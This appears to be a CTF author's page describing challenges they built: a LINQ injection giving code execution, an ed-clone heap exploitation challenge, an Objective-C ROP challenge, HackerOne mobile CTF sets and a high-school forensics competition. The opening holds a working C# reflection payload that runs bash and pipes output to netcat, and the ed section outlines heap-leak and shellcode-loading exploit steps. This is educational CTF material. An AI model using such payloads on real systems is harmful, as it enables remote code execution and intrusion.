This was basically SQL Injection in Linq which, unfortunately, gives you RCE.
"".GetType().Assembly.GetType("System.AppDomain").GetMethods()[18].Invoke("".GetType().Assembly.GetType("System.AppDomain").GetProperty("CurrentDomain").GetValue(null), "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;System.Diagnostics.Process".Split(";".ToCharArray())).GetType().GetMethods()[80].Invoke(null, "bash;-c 'ls | nc 0 9001'".Split(";".ToCharArray()))
An ed, the standard editor, clone but without the easy !/bin/sh shellcode.
This challenge did not require any memory corruption. The goal of this challenge was to make people understand how to use ed, heh.
- Use ed commands to load the ed binary into ed and print it out
- Join two lines so that the length becomes out of sync
- Allocate some strings on the heap
- Since the program thinks the size of the line is really big (as a result of a lot of subtractions being done to the line length), we can search for all ascii chars (0-255) using find and parse out the results to essentially leak the heap
- From the heap leak, you can pull the filename which was randomly generated
- Put payload file path on the heap
- Overflow the mark table until you can change the
can_saveandfilename. - Create a stripped down shared object with shellcode
- Now that we know the name of the file, we can write our payload to it and load it to execute our shellcode
Pretty straight forward ROP challenge with a slight twist of having to craft a fake obj-c dtable method lookup. You can check out the internals of obj-c for linux here.
A collection of CTFs that I made for HackerOne which are mobile focused, with a bit of web.
- h1-702-2017 - iOS (5 challenges) and Android (5 challenges) crackmes with incremental difficulty
- h1-202-2018 - A single app which calls into server components. I really liked making this one a lot since you had to progress through the challenge to solve it all. It was also my first time using Retrofit and I really wish I knew about it earlier lol
- h1-702-2018 - Five Android challenges: 3 crackmes and 2 pwnables (Object deserialization and memory corruption). It was really cool to have pwnable challenges for mobile, but operations wise it was a complete failure. I plan on making this a lot better for the next time.
A CTF that I put on annually for a school county for high schoolers. It is a mock digial forensics investigation which has flags, but is not a jeapordy style CTF. You have to make your way through the evidence and write a report on your findings. Based on the flags that the teams found, you can do an initial filtering of all the competitors and identify the top finishers. Then, you will read through their reports and identify the teams which successfully solved the crime and found the most incriminating evidence. I started running this when the high school event I used to run, CSAW HSF, unfortunately became a mind numbing jeapordy style CTF. I love this format and have plans to operationalize it so that schools across the world can run their own version of it.